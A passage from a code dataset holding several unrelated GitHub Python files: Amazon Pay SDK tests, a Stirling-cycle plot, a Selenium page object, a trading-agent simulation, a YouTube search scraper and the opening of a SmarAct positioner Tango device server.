self.response.to_json()\n utf8_text = '{\"test\": \"الفلانية فلا\"}'\n self.assertEqual(text, utf8_text)\n\n @patch('requests.post')\n def test_response_to_dict(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n response = self.client.get_service_status()\n self.assertEqual(type(response.to_dict()), dict)\n\n @patch('requests.get')\n def test_get_login_profile(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_get_login_profile\n response = self.client.get_login_profile('access_token', 'client_id')\n\n def test_environment_variables(self):\n os.environ['AP_REGION'] = 'na'\n os.environ['AP_MWS_ACCESS_KEY'] = 'AP_MWS_ACCESS_KEY'\n os.environ['AP_MERCHANT_ID'] = 'AP_MERCHANT_ID'\n os.environ['AP_CURRENCY_CODE'] = 'AP_CURRENCY_CODE'\n os.environ['AP_MWS_SECRET_KEY'] = 'AP_MWS_SECRET_KEY'\n\n client = AmazonPayClient(sandbox=True)\n self.assertEqual(client.region, 'na')\n self.assertEqual(client.mws_access_key, 'AP_MWS_ACCESS_KEY')\n self.assertEqual(client.mws_secret_key, 'AP_MWS_SECRET_KEY')\n self.assertEqual(client.merchant_id, 'AP_MERCHANT_ID')\n self.assertEqual(client.currency_code, 'AP_CURRENCY_CODE')\n\n os.environ['AP_REGION'] = 'AP_REGION'\n with self.assertRaises(KeyError):\n client = AmazonPayClient()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"amzn/amazon-pay-sdk-python","sub_path":"test/test_ap.py","file_name":"test_ap.py","file_ext":"py","file_size_in_byte":41394,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"48"} +{"seq_id":"40371265547","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 20 23:11:20 2022\nTD22 - Stirling engine (https://fr.wikipedia.org/wiki/Moteur_Stirling)\n@author: remimetzdorff\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nV1m, V1M = 0, 0.0001\nV2m, V2M = 0, 0.0001\n\ndef V1(t):\n return (V1M-V1m) * np.cos(2*np.pi*t) / 2 + (V1M + V1m) / 2\n\ndef V2(t):\n return (V2M-V2m) * np.sin(2*np.pi*t) / 2 + (V2M + V2m) / 2\n\ndef V(t):\n return V1(t) + V2(t)\n\nt = np.linspace(0, 1, 1000)\nV_reel = V(t)\nVm, VM = min(V_reel), max(V_reel)\n\nT1, T2 = 300, 1000\nR = 8.314\nn = 1e5 * Vm / R / T1\nm = n * 29e-3\n\ndef P(t):\n n1 = n * T2/V2(t) / ( T1/V1(t) + T2/V2(t) )\n return n1 * R * T1 / V1(t)\n\nP_reel = P(t)\n\n
Pa, Pb = n*R*T1/Vm, n*R*T2/Vm\nPc, Pd = n*R*T2/VM, n*R*T1/VM\n\nv = np.linspace(Vm, VM)\nv_rev = np.linspace(VM, Vm)\n\nPbc = Pb*Vm / v\nPda = Pa*Vm / v_rev\n\nV_mod = np.array([Vm, Vm] + list(v) + [VM, VM] + list(v_rev))\nP_mod = np.array([Pa, Pb] + list(Pbc) + [Pc, Pd] + list(Pda))\n\nplt.plot(V_reel/m, P_reel*1e-5, label=\"'real' cycle\")\nplt.plot(V_mod/m, P_mod*1e-5, label=\"model cycle\")\nplt.xlabel(\"Specific volume $v$ ($\\\\rm{m^3 \cdot kg^{-1}}$)\")\nplt.ylabel(\"Pressure (bar)\")\nplt.title(\"Clapeyron diagram of a Stirling cycle\")\nplt.xlim(0,6)\nplt.ylim(0,4)\nplt.legend()","repo_name":"remimetzdorff/mp2i","sub_path":"python/td22-stirling.py","file_name":"td22-stirling.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"37241843352","text":"word_a = 'hello'\nword_b = 'world'\n\n# Sets of letters in the words;\n# each letter appears only once\nin_a = set(word_a)\nin_b = set(word_b)\n\n# Intersection of the two sets\ncommon = in_a.intersection(in_b)\n\n# Also works for this task:\n# common = in_b.intersection(in_a)\n\n# Print common letters\nprint(common) # {'l', 'o'}\n","repo_name":"ash/amazing_python3","sub_path":"tasks/t-005.py","file_name":"t-005.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"48"} +{"seq_id":"4166520725","text":"import math\n\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom .locators import MainPageLocators\n\n\nclass BasePage:\n def __init__(self, browser, url):\n self.browser = browser\n self.url = url\n\n def open(self):\n self.browser.get(self.url)\n\n def is_element_present(self, how, what):\n try:\n self.browser.find_element(how, what)\n except NoSuchElementException:\n return False\n return True\n\n def is_not_element_present(self, how, what, timeout=4):\n try:\n WebDriverWait(self.browser, timeout).until(EC.presence_of_element_located((how, what)))\n except TimeoutException:\n return True\n\n return False\n\n def is_disappeared(self, how, what, timeout=4):\n try:\n WebDriverWait(self.browser, timeout, 1, TimeoutException). 
\\\n until_not(EC.presence_of_element_located((how, what)))\n except TimeoutException:\n return False\n\n return True\n\n def get_element(self, how, what):\n el = self.browser.find_element(how, what)\n assert el, 'element not found'\n return el\n\n def solve_quiz_and_get_code(self):\n alert = self.browser.switch_to.alert\n x = alert.text.split(\" \")[2]\n answer = str(math.log(abs((12 * math.sin(float(x))))))\n alert.send_keys(answer)\n alert.accept()\n try:\n alert = self.browser.switch_to.alert\n alert_text = alert.text\n print(f\"Your code: {alert_text}\")\n alert.accept()\n except NoAlertPresentException:\n print(\"No second alert presented\")\n\n def go_to_login_page(self):\n from pages import LoginPage\n link = self.browser.find_element(*MainPageLocators.LOGIN_LINK)\n link.click()\n try:\n alert = self.browser.switch_to.alert\n alert.accept()\n except:\n pass\n return LoginPage(browser=self.browser, url=self.browser.current_url)\n\n def go_to_basket(self):\n from pages import BasketPage\n link = self.browser.find_element(*MainPageLocators.BASKET_LINK)\n link.click()\n return BasketPage(browser=self.browser, url=self.browser.current_url)\n\n def should_be_authorized_user(self):\n assert self.is_element_present(*MainPageLocators.USER_ICON), \"User not authorized\"\n\n def should_be_login_link(self):\n assert self.is_element_present(*MainPageLocators.LOGIN_LINK)\n","repo_name":"StuBz211/python-selenium-autotest","sub_path":"pages/base_page.py","file_name":"base_page.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35337498205","text":"from lattice.wallet import *\nfrom lattice.market import *\nfrom lattice.broker import *\nfrom lattice.order import *\nfrom lattice.utils import logging\nfrom lattice.models import gnn\nfrom lattice.config import InvestorConfig\n\nimport jax\nimport jraph\nimport numpy as np\nimport haiku as hk\nfrom typing import Dict, List, Union\nfrom pathlib import Path\nfrom abc import ABC, abstractmethod\n\n\ndef get_investor(wallet, market, broker, config):\n name = config[\"class\"]\n for cls in Investor.__subclasses__():\n if cls.__name__ == name:\n return cls(wallet, market, broker, config)\n raise ValueError(f\"There is no Investor subclass called {name}\")\n\n\nclass Investor:\n def __init__(\n self, wallet: Wallet, market: Market, broker: Broker, config: InvestorConfig\n ) -> None:\n self.__dict__.update(config)\n self.wallet = wallet\n self.market = market\n self.broker = broker\n\n def reset(self):\n self.market.reset()\n self.wallet.reset()\n self.broker.reset()\n\n def submit_orders(self, orders: List[Order], prices: Dict[str, float]) -> None:\n for order in orders:\n if self.wallet.can_afford(order):\n success = self.broker.place_order(order)\n if success:\n self.wallet.update_balance(order, prices)\n\n def cancel_orders(self, order_ids: List[str]) -> None:\n for oid in order_ids:\n self.broker.cancel_order(oid)\n\n @abstractmethod\n def evaluate_market(self):\n pass\n\n\nclass BernoulliInvestor(Investor):\n def __init__(self, wallet, market, broker, config) -> None:\n super().__init__(wallet, market, broker, config)\n self.hourly_limit = int(60 / 5)\n\n def evaluate_market(self) -> bool:\n\n # Check state of the market\n done, time, prices, features = self.market.get_state()\n\n # Select an action / make a decision\n market_name = np.random.choice(self.market.markets)\n\n # Create an order\n if self.market.t % self.hourly_limit == 0:\n order = 
self.broker.market_order(\n market=market_name,\n side=np.random.choice([\"BUY\", \"SELL\"], p=self.p),\n size=0.1,\n open_price=prices[market_name],\n open_time=time,\n )\n else:\n order = None\n self.submit_orders([order], prices)\n return not done\n\n\nclass GNNInvestor(Investor):\n def __init__(self, wallet, market, broker, config) -> None:\n super().__init__(wallet, market, broker, config)\n self.seed = int(self.seed)\n self.weight_dir = paths.weights / self.name\n self.network = hk.without_apply_rng(hk.transform(gnn.network_definition))\n self.initialized = False\n self.action_map = {0: \"HOLD\", 1: \"BUY\", 2: \"SELL\"}\n\n if self.train:\n self.experience = logging.ExperienceBuffer()\n\n def set_params(self, graph: jraph.GraphsTuple) -> None:\n if not self.initialized:\n if self.weight_dir.exists():\n self.params = jax.numpy.load(self.weight_dir)\n else:\n self.params = self.network.init(jax.random.PRNGKey(self.seed), graph)\n self.weight_dir.parent.mkdir(exist_ok=True)\n self.save_params()\n self.initialized = True\n\n def save_params(self):\n jax.numpy.save(self.weight_dir, self.params)\n\n def get_actions(self, features, global_features) -> List[str]:\n graph = gnn.construct_graph(features=features, global_features=global_features)\n self.set_params(graph)\n self.graph = graph\n logits = self.network.apply(self.params, graph)\n actions = jax.random.categorical(\n key=jax.random.PRNGKey(self.seed), logits=logits\n )\n return actions.tolist()\n\n def evaluate_market(self) -> Union[bool, logging.ExperienceBuffer]:\n # Check state of the market\n done, time, prices, market_features = self.market.get_state()\n print(time)\n\n # Calling GNN model\n # TODO: Make these the proportions of cash and other tradable assets\n wallet_features = jax.numpy.array([[0.0, 0.0, 0.0]]) \n actions = self.get_actions(\n features=market_features, global_features=wallet_features\n )\n\n # Creating orders\n orders = [None]\n for i, market_name in enumerate(self.market.markets):\n # Reset per market so a HOLD action cannot resubmit the previous order\n order = None\n action = self.action_map[actions[i]]\n if action == \"BUY\":\n order = self.broker.market_order(\n market=market_name,\n side=\"BUY\",\n size=0.01,\n open_price=prices[market_name],\n open_time=time,\n )\n elif action == \"SELL\":\n order = self.broker.market_order(\n market=market_name,\n side=\"SELL\",\n size=0.01,\n open_price=prices[market_name],\n open_time=time,\n )\n orders.append(order)\n self.submit_orders([order], prices)\n\n if self.train:\n self.experience.push(self.graph, actions)\n\n if done:\n history = self.wallet.get_history()\n wallet_values = history[\"total_value\"].values\n self.experience.reward_to_go(wallet_values, self.market.num_markets)\n return self.experience.state_action_reward()\n\n return not done\n","repo_name":"magi-1/lattice","sub_path":"lattice/investor.py","file_name":"investor.py","file_ext":"py","file_size_in_byte":5531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10279494536","text":"import requests, logging, json, re, csv, os\nfrom urllib.parse import quote\nfrom datetime import datetime\n\n\n#USER CONFIG\nproxies = {\n\t#'https': 'ip:port', # uncomment this line to enable a proxy\n}\n\n\n#logger settings\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nfileFMT = logging.Formatter(datefmt='%y-%m-%d %H:%M:%S', fmt='[%(asctime)s][%(module)s.py][%(funcName)s][%(levelname)s] %(message)s ')\nconsoleFMT = logging.Formatter(datefmt='%y-%m-%d %H:%M:%S', fmt = '[%(asctime)s] %(message)s')\nstream_handler = 
logging.StreamHandler()\nstream_handler.setLevel(logging.INFO)\nstream_handler.setFormatter(consoleFMT)\nlogger.addHandler(stream_handler)\n\nclass SearchParser:\n\tdef __init__(self, search_text, proxies={}):\n\t\tself.headers = {\n\t\t\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36\",\n\t\t'x-youtube-client-name': '1',\n\t\t'x-youtube-client-version': '2.20200605.00.00',\n\t\t'Accept-Language': 'en-US,en;q=0.5'\n\t\t}\n\t\tself.proxies = proxies\n\t\tself.language = {'Accept-Language': 'en-US,en;q=0.5'}\n\t\tself.search_quote = quote(search_text)\n\t\tself.search_text = search_text\n\t\tself.page_template = 'https://www.youtube.com/results?search_query={}&page={}'\n\t\tself.session = requests.Session()\n\t\tself.result = {}\n\t\tself.result['videos'] = {}\n\t\tself.result['channels'] = {}\n\t\tself.result['playlists'] = {}\n\t\tself.result['movies'] = {}\n\t\tself.result['radios'] = {}\n\n\tdef get_json_content(self, page_number):\n\t\turl = self.page_template.format(self.search_quote, page_number)\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tpage = self.session.get(url, headers=self.language, proxies=self.proxies).text\n\t\t\t\tjson_text = re.findall(r'(\\{\"responseContext\".+\\{\\}\\}\\}|\\{\"responseContext\".+\"\\]\\})', page)[0]\n\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tpass\n\t\tjson_content = json.loads(json_text)\n\t\treturn json_content\n\n\tdef parse_json_content(self, json_content):\n\t\tcontents = json_content['contents']['twoColumnSearchResultsRenderer']['primaryContents']['sectionListRenderer']['contents']\n\t\tneedReturn = False\n\t\t###########ANTI AD###########\n\t\titemSection = 0\n\t\tcontent_types = ['channelRenderer', 'playlistRenderer', 'movieRenderer', 'videoRenderer', 'messageRenderer', 'radioRenderer', 'horizontalCardListRenderer', 'shelfRenderer']\n\t\tcontents_found = False\n\t\twhile True:\n\t\t\tsection = contents[itemSection]\n\t\t\tif 'itemSectionRenderer' in section:\n\t\t\t\titemContents = section['itemSectionRenderer']['contents']\n\t\t\t\tfor content_type in content_types:\n\t\t\t\t\tif content_type in itemContents[0].keys():\n\t\t\t\t\t\tcontents = itemContents\n\t\t\t\t\t\tcontents_found = True\n\t\t\t\t\t\tbreak\n\t\t\t\tif contents_found:\n\t\t\t\t\tbreak\n\t\t\t\titemSection += 1\n\t\t##############################\n\t\tfor content in contents:\n\t\t\tif 'channelRenderer' in content:\n\t\t\t\tchannel_title = content['channelRenderer']['title']['simpleText']\n\t\t\t\tchannelId = content['channelRenderer']['channelId']\n\t\t\t\tchannel_url = 'https://www.youtube.com/channel/' + channelId\n\t\t\t\tif 'Topic' not in channel_title:\n\t\t\t\t\tif 'videoCountText' in content['channelRenderer']:\n\t\t\t\t\t\tvideo_count = content['channelRenderer']['videoCountText']['runs'][0]['text'].replace(',', '')\n\t\t\t\t\t\tvideo_count = int(re.findall(r'\\d+', video_count)[0])\n\t\t\t\t\telse:\n\t\t\t\t\t\tvideo_count = 0\n\t\t\t\telse:\n\t\t\t\t\tvideo_count = None\n\n\t\t\t\tif 'subscriberCountText' in content['channelRenderer']:\n\t\t\t\t\tchannel_subscribers = content['channelRenderer']['subscriberCountText']['simpleText'].replace(',', '')\n\t\t\t\t\tif 'M' in channel_subscribers:\n\t\t\t\t\t\tchannel_subscribers = int(float(re.findall(r'(\\d+\\.\\d+|\\d+)', channel_subscribers)[0]) * 1000000)\n\t\t\t\t\telif 'K' in channel_subscribers:\n\t\t\t\t\t\tchannel_subscribers = int(float(re.findall(r'(\\d+\\.\\d+|\\d+)', channel_subscribers)[0]) * 1000)\n\t\t\t\t\telse:\n\t\t\t\t\t\tchannel_subscribers 
= int(re.findall(r'\\d+', channel_subscribers)[0])\n\t\t\t\telse:\n\t\t\t\t\tchannel_subscribers = 0\n\n\t\t\t\tself.result['channels'][channelId] = {}\n\t\t\t\tself.result['channels'][channelId]['title'] = channel_title\n\t\t\t\tself.result['channels'][channelId]['url'] = channel_url\n\t\t\t\tself.result['channels'][channelId]['video_count'] = video_count\n\t\t\t\tself.result['channels'][channelId]['subscribers'] = channel_subscribers\n\n\t\t\telif 'videoRenderer' in content:\n\t\t\t\tvideoId = content['videoRenderer']['videoId']\n\t\t\t\tself.result['videos'][videoId] = {}\n\t\t\t\tvideo_title = content['videoRenderer']['title']['runs'][0]['text']\n\t\t\t\tvideo_url = 'https://www.youtube.com/watch?v=' + videoId\n\t\t\t\tif 'upcomingEventData' in content['videoRenderer']:\n\t\t\t\t\ttime_stamp = int(content['videoRenderer']['upcomingEventData']['startTime'])\n\t\t\t\t\tscheduled_time = datetime.utcfromtimestamp(time_stamp).strftime('%Y/%m/%d %H:%M')\n\t\t\t\t\tvideo_published_time = 'scheduled for ' + scheduled_time\n\t\t\t\telse:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tvideo_published_time = content['videoRenderer']['publishedTimeText']['simpleText']\n\t\t\t\t\texcept:\n\t\t\t\t\t\tvideo_published_time = 'music/live/unknown'\n\t\t\t\ttry:\n\t\t\t\t\tvideo_length = content['videoRenderer']['lengthText']['simpleText']\n\t\t\t\texcept:\n\t\t\t\t\tvideo_length = 'live/unknown'\n\t\t\t\tif 'upcomingEventData' in content['videoRenderer']:\n\t\t\t\t\tvideo_views = 0\n\t\t\t\telse:\n\t\t\t\t\tif 'viewCountText' in content['videoRenderer']:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tvideo_views = content['videoRenderer']['viewCountText']['simpleText'].replace(',', '')\n\t\t\t\t\t\t\tviews_match = re.search(r'[0-9]+', video_views)\n\t\t\t\t\t\t\tif views_match:\n\t\t\t\t\t\t\t\tvideo_views = int(views_match.group(0).replace(',', ''))\n\t\t\t\t\t\t\telif video_views == 'No views':\n\t\t\t\t\t\t\t\tvideo_views = 0\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tvideo_views = content['videoRenderer']['viewCountText']['runs'][0]['text'].replace(',', '')\n\t\t\t\t\t\t\tviews_match = re.search(r'[0-9]+', video_views)\n\t\t\t\t\t\t\tif views_match:\n\t\t\t\t\t\t\t\tvideo_views = int(views_match.group(0))\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tvideo_views = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tvideo_views = None\n\t\t\t\tvideo_owner = content['videoRenderer']['ownerText']['runs'][0]['text']\n\t\t\t\tself.result['videos'][videoId]['title'] = video_title\n\t\t\t\tself.result['videos'][videoId]['url'] = video_url\n\t\t\t\tself.result['videos'][videoId]['published_time'] = video_published_time\n\t\t\t\tself.result['videos'][videoId]['video_length'] = video_length\n\t\t\t\tself.result['videos'][videoId]['views'] = video_views\n\t\t\t\tself.result['videos'][videoId]['video_owner'] = video_owner\n\t\t\telif 'playlistRenderer' in content:\n\t\t\t\tplaylistId = content['playlistRenderer']['playlistId']\n\t\t\t\tplaylist_url = 'https://www.youtube.com/playlist?list=' + playlistId\n\t\t\t\tplaylist_title = content['playlistRenderer']['title']['simpleText']\n\t\t\t\tplaylist_video_count = int(content['playlistRenderer']['videoCount'])\n\t\t\t\tself.result['playlists'][playlistId] = {}\n\t\t\t\tself.result['playlists'][playlistId]['title'] = playlist_title\n\t\t\t\tself.result['playlists'][playlistId]['url'] = playlist_url\n\t\t\t\tself.result['playlists'][playlistId]['video_count'] = playlist_video_count\n\t\t\telif 'movieRenderer' in content:\n\t\t\t\tmovieId = content['movieRenderer']['videoId']\n\t\t\t\tmovie_url = 'https://www.youtube.com/watch?v=' + 
movieId\n\t\t\t\tmovie_title = content['movieRenderer']['title']['runs'][0]['text']\n\t\t\t\tmovie_duration = content['movieRenderer']['lengthText']['simpleText']\n\t\t\t\tmetadata = ''\n\t\t\t\ttry:\n\t\t\t\t\tfor info in content['movieRenderer']['topMetadataItems']:\n\t\t\t\t\t\tmetadata += info['simpleText'] + '\\n'\n\t\t\t\texcept KeyError:\n\t\t\t\t\tpass\n\t\t\t\ttry:\n\t\t\t\t\tfor info in content['movieRenderer']['bottomMetadataItems']:\n\t\t\t\t\t\tmetadata += info['simpleText'] + '\\n'\n\t\t\t\texcept KeyError:\n\t\t\t\t\tpass\n\t\t\t\tself.result['movies'][movieId] = {}\n\t\t\t\tself.result['movies'][movieId]['title'] = movie_title\n\t\t\t\tself.result['movies'][movieId]['url'] = movie_url\n\t\t\t\tself.result['movies'][movieId]['duration'] = movie_duration\n\t\t\t\tself.result['movies'][movieId]['metadata'] = metadata\n\t\t\telif 'radioRenderer' in content:\n\t\t\t\tradio_title = content['radioRenderer']['title']['simpleText']\n\t\t\t\tradioId = content['radioRenderer']['playlistId']\n\t\t\t\tvideo_count = content['radioRenderer']['videoCountText']['runs'][0]['text']\n\t\t\t\tradio_url = 'https://www.youtube.com' + content['radioRenderer']['navigationEndpoint']['commandMetadata']['webCommandMetadata']['url']\n\t\t\t\tself.result['radios'][radioId] = {}\n\t\t\t\tself.result['radios'][radioId]['title'] = radio_title\n\t\t\t\tself.result['radios'][radioId]['url'] = radio_url\n\t\t\t\tself.result['radios'][radioId]['video_count'] = video_count\n\t\t\telif 'messageRenderer' in content:\n\t\t\t\tif content['messageRenderer']['text']['runs'][0]['text'] == 'No more results':\n\t\t\t\t\tneedReturn = True\n\t\tlogger.info('*' * 50)\n\t\tlogger.info('Current videos count: ' + str(len(self.result['videos'])))\n\t\tlogger.info('Current playlists count: ' + str(len(self.result['playlists'])))\n\t\tlogger.info('Current movies count: ' + str(len(self.result['movies'])))\n\t\tlogger.info('Current channels count: ' + str(len(self.result['channels'])))\n\t\tlogger.info('Current radios count: ' + str(len(self.result['radios'])))\n\t\tif needReturn:\n\t\t\treturn 'stop'\n\tdef start(self):\n\t\tlogger.info('Proxy: ' + self.proxies.get('https', 'no proxy'))\n\t\tpage_number = 1\n\t\tresult = None\n\t\tlogger.info('Parsing...')\n\t\twhile result == None:\n\t\t\tjson_content = self.get_json_content(str(page_number))\n\t\t\tresult = self.parse_json_content(json_content)\n\t\t\tpage_number += 1\n\t\tlogger.info('Search was parsed.')\n\t\tlogger.info(' - Videos : ' + str(len(self.result['videos'])))\n\t\tlogger.info(' - Playlists : ' + str(len(self.result['playlists'])))\n\t\tlogger.info(' - Channels : ' + str(len(self.result['channels'])))\n\t\tlogger.info(' - Movies : ' + str(len(self.result['movies'])))\n\t\tlogger.info(' - Radios : ' + str(len(self.result['radios'])))\n\t\treturn self.result\n\nif __name__ == '__main__':\n\tsearch_text = input('Enter search text: ').strip()\n\tsearchParser = SearchParser(search_text, proxies)\n\tresult = searchParser.start()\n\tdatetime_stmp = str(datetime.now().strftime('%Y-%m-%d %H-%M'))\n\tfolder_name = 'search parser ' + datetime_stmp\n\tos.mkdir(folder_name)\n\tchannels = result['channels']\n\tvideos = result['videos']\n\tradios = result['radios']\n\tplaylists = result['playlists']\n\tmovies = result['movies']\n\n\twith open('./' + folder_name + '/channels.csv', 'w') as f:\n\t\tcsv_writer = csv.writer(f)\n\t\tcsv_writer.writerow(['channelId', 'title', 'url', 'video_count', 'subscribers'])\n\tfor channelId, metadata in channels.items():\n\t\twith open('./' + 
folder_name + '/channels.csv', 'a') as f:\n\t\t\tcsv_writer = csv.writer(f)\n\t\t\tcsv_writer.writerow([channelId, metadata['title'], metadata['url'], metadata['video_count'], metadata['subscribers']])\n\n\twith open('./' + folder_name + '/videos.csv', 'w') as f:\n\t\tcsv_writer = csv.writer(f)\n\t\tcsv_writer.writerow(['videoId', 'title', 'url', 'published_time', 'video_length', 'views', 'video_owner'])\n\tfor videoId, metadata in videos.items():\n\t\twith open('./' + folder_name + '/videos.csv', 'a') as f:\n\t\t\tcsv_writer = csv.writer(f)\n\t\t\tcsv_writer.writerow([videoId, metadata['title'], metadata['url'], metadata['published_time'], metadata['video_length'], metadata['views'], metadata['video_owner']])\n\n\twith open('./' + folder_name + '/radios.csv', 'w') as f:\n\t\tcsv_writer = csv.writer(f)\n\t\tcsv_writer.writerow(['radioId', 'title', 'url', 'video_count'])\n\tfor radioId, metadata in radios.items():\n\t\twith open('./' + folder_name + '/radios.csv', 'a') as f:\n\t\t\tcsv_writer = csv.writer(f)\n\t\t\tcsv_writer.writerow([radioId, metadata['title'], metadata['url'], metadata['video_count']])\n\n\twith open('./' + folder_name + '/playlists.csv', 'w') as f:\n\t\tcsv_writer = csv.writer(f)\n\t\tcsv_writer.writerow(['playlistId', 'title', 'url', 'video_count'])\n\tfor playlistId, metadata in playlists.items():\n\t\twith open('./' + folder_name + '/playlists.csv', 'a') as f:\n\t\t\tcsv_writer = csv.writer(f)\n\t\t\tcsv_writer.writerow([playlistId, metadata['title'], metadata['url'], metadata['video_count']])\n\n\twith open('./' + folder_name + '/movies.csv', 'w') as f:\n\t\tcsv_writer = csv.writer(f)\n\t\tcsv_writer.writerow(['movieId', 'title', 'url', 'duration', 'metadata'])\n\tfor movieId, metadata in movies.items():\n\t\twith open('./' + folder_name + '/movies.csv', 'a') as f:\n\t\t\tcsv_writer = csv.writer(f)\n\t\t\tcsv_writer.writerow([movieId, metadata['title'], metadata['url'], metadata['duration'], metadata['metadata']])\n\n\n\n","repo_name":"xeosin1/youtube_parsers","sub_path":"searchParser.py","file_name":"searchParser.py","file_ext":"py","file_size_in_byte":12079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23211067051","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 8 14:49:24 2021\n\nController interface for a SmarAct axis\n\nNOTE: this version only supports the ethernet version\n\n@author: Michele Devetta (michele.devetta@cnr.it)\n\"\"\"\n\nimport time\nimport math\nimport numpy as np\nimport threading\nimport PyTango as PT\nimport PyTango.server as PTS\nfrom SmarActUtils import MoveMode, CalibrationOptions, ReferencingOptions, AxisState, SensorType, BaseUnit\n# from SmarActUtils import ActuatorMode, PosMovementType\n\n\nclass SmarActPositioner(PTS.Device, metaclass=PTS.DeviceMeta):\n\n # proxy = PTS.device_property(dtype=str, doc=\"MCS2 proxy device\", mandatory=True)\n # axis = PTS.device_property(dtype=PT.DevShort, doc=\"MCS2 axis number\", mandatory=True)\n # autoreference = PTS.device_property(dtype=PT.DevBoolean, doc=\"Automatically reference upon startup\", mandatory=False, default_value=False)\n # polling = PTS.device_property(dtype=PT.DevULong, doc=\"Polling period in ms\", mandatory=False, default_value=500)\n proxy = PTS.device_property(dtype=str, doc=\"MCS2 proxy device\")\n axis = PTS.device_property(dtype=PT.DevShort, doc=\"MCS2 axis number\")\n autoreference = PTS.device_property(dtype=PT.DevBoolean, doc=\"Automatically reference upon startup\", 
default_value=False)\n polling = PTS.device_property(dtype=PT.DevULong, doc=\"Polling period in ms\", default_value=500)\n ref_reverse = PTS.device_property(dtype=PT.DevBoolean, doc=\"Invert referencing direction\", default_value=False)\n ref_movebefore = PTS.device_property(dtype=PT.DevDouble, doc=\"Relative move before starting referencing\", default_value=0.0)\n no_direct_control = PTS.device_property(dtype=PT.DevBoolean, doc=\"Forbid direct control with SmaractGUI\", default_value=False)\n\n# MoveMode = PTS.attribute(\n# label=\"Move mode\", dtype=PT.DevEnum, enum_labels=MoveMode.getEnum(),\n# access=PT.AttrWriteType.READ_WRITE, doc=\"Move mode\", fisallowed='IsProxyOnline')\n#\n# ActuatorMode = PTS.attribute(\n# label=\"Actuator mode\", dtype=PT.DevEnum, enum_labels=ActuatorMode.getEnum(),\n# access=PT.AttrWriteType.READ_WRITE, doc=\"Actuator mode\", fisallowed='IsProxyOnline')\n\n def init_device(self):\n \"\"\" Initialize device\n \"\"\"\n # Set INIT state\n self.set_state(PT.DevState.INIT)\n\n # Call parent init\n PTS.Device.init_device(self)\n\n # Work variables\n self._do_reference = False\n\n # Create proxy\n self.dev = PT.DeviceProxy(self.proxy)\n self.debug_stream(\"Proxy device {0} up and running\".format(self.dev.name()))\n\n try:\n self.initialize_device()\n self.set_state(PT.DevState.STANDBY)\n except PT.DevFailed as e:\n self.error_stream(\"Failed device init (Error: {0!s})\".format(e.args[0].desc))\n self.set_state(PT.DevState.FAULT)\n\n # Enable events on attributes\n self.Position.set_change_event(True, False)\n self.Velocity.set_change_event(True, False)\n self.Acceleration.set_change_event(True, False)\n self.MotionDone.set_change_event(True, False)\n self.IsCalibrated.set_change_event(True, False)\n self.IsReferenced.set_change_event(True, False)\n\n # Set polling time for State command\n self.poll_command(\"State\", 500)\n self.debug_stream(\"Configured events\")\n\n # Start polling thread\n self._terminate = False\n self._th = threading.Thread(target=self.PollingThread)\n self._th.start()\n\n def initialize_device(self):\n\n st = AxisState(self.dev.AxisState(self.axis))\n self.debug_stream(\"Axis {0:d} state is: {1:d}\".format(self.axis, st.getValue()))\n\n # Set move mode to absolute closed loop (the only mode supported yet)\n self.dev.SetMoveMode(np.array([self.axis, MoveMode.SA_CTL_MOVE_MODE_CL_ABSOLUTE], dtype=np.int32))\n\n # Set proper unit and conversion for position\n unit = BaseUnit(self.dev.GetBaseUnit(self.axis))\n resolution = self.dev.GetBaseResolution(self.axis)\n\n pos_pp = self.Position.get_properties()\n vel_pp = self.Velocity.get_properties()\n acc_pp = self.Acceleration.get_properties()\n if unit.isMeter():\n pos_pp.unit = \"um\"\n pos_pp.format = \"%.3f\"\n vel_pp.unit = \"um/s\"\n vel_pp.format = \"%.3f\"\n acc_pp.unit = \"um/s^2\"\n acc_pp.format = \"%.3f\"\n self._conv_factor = math.pow(10.0, resolution + 6)\n\n elif unit.isDegree():\n pos_pp.unit = \"deg\"\n pos_pp.format = \"%.6f\"\n vel_pp.unit = \"deg/s\"\n vel_pp.format = \"%.6f\"\n acc_pp.unit = \"deg/s^2\"\n acc_pp.format = \"%.6f\"\n self._conv_factor = math.pow(10.0, resolution)\n\n else:\n pos_pp.unit = \"n.a.\"\n vel_pp.unit = \"n.a.\"\n acc_pp.unit = \"n.a.\"\n self._conv_factor = 1.0\n\n self.Position.set_properties(pos_pp)\n self.Velocity.set_properties(vel_pp)\n self.Acceleration.set_properties(acc_pp)\n self.debug_stream(\"Configured units. 
